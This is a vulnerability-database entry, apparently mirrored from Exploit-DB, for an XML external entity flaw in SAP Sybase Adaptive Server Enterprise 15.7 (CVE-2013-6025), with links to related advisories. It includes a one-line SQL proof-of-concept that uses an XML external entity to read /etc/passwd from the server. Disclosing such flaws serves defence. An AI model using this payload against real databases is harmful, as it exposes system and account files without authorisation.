Lucene search
Igor BulatenkoEDB-ID:38805HistoryNov 25, 2015 - 12:00 a.m.
SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure
2015-11-2500:00:00
Igor Bulatenko
www.exploit-db.com
22
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/63193/info
SAP Sybase Adaptive Server Enterprise is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
SAP Sybase Adaptive Server Enterprise 15.7 ESD 2 is vulnerable; other versions may also be affected.
SELECT xmlextract('/', xmlparse('<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/passwd">]><content>&abc;</content>')) Related
nvd
nvd
CVE-2013-6025
2013-10-19 10:36:08
cert
cert
SAP Sybase Adaptive Server Enterprise vulnerable to XML injection
2013-10-17 00:00:00
packetstorm
packetstorm
SAP Sybase Adapter Server Enterprise XXE Injection
2015-11-25 00:00:00
prion
prion
Xxe
2013-10-19 10:36:00
nessus
nessus
cvelist
cvelist
CVE-2013-6025
2013-10-19 10:00:00
zdt
zdt
cve
cve
CVE-2013-6025
2013-10-19 10:36:08
ptsecurity
ptsecurity
PT-2012-61: XML External Entities Injection in SAP Sybase ASE
2013-10-24 00:00:00